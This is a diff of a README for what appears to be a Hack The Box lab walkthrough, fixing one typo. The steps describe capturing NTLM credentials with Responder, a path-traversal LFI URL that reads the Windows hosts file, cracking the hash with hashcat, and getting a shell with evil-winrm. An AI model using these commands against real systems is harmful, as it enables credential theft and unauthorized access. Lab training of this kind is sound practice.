Tuuxy/ADAuthProtocolsAndResponder/README.md

 - Show the responder configuration file in `/opt/tools/Responder/Responder.conf`
 - Launch responder `responder -I tun0 -dvw`
 - Trigger a DNS error via an LFI in the target's website by searching for a share that does not exist (can show the existence of the lfi by visiting http://unika.htb/index?page=../../../../../../../../windows/system32/drivers/etc/hosts)
-- Receive the uer credentials, crack it with hashcat `hashcat -m 5600 -a 0 hash.txt /usr/share/wordlist/rockyou.txt`
+- Receive the user credentials, crack it with hashcat `hashcat -m 5600 -a 0 hash.txt /usr/share/wordlist/rockyou.txt`
 - Gain a shell with evil-winrm and its command: `evil-winrm -i <our-ip-address> -u <username> -p <password>`

 ## Sources and resources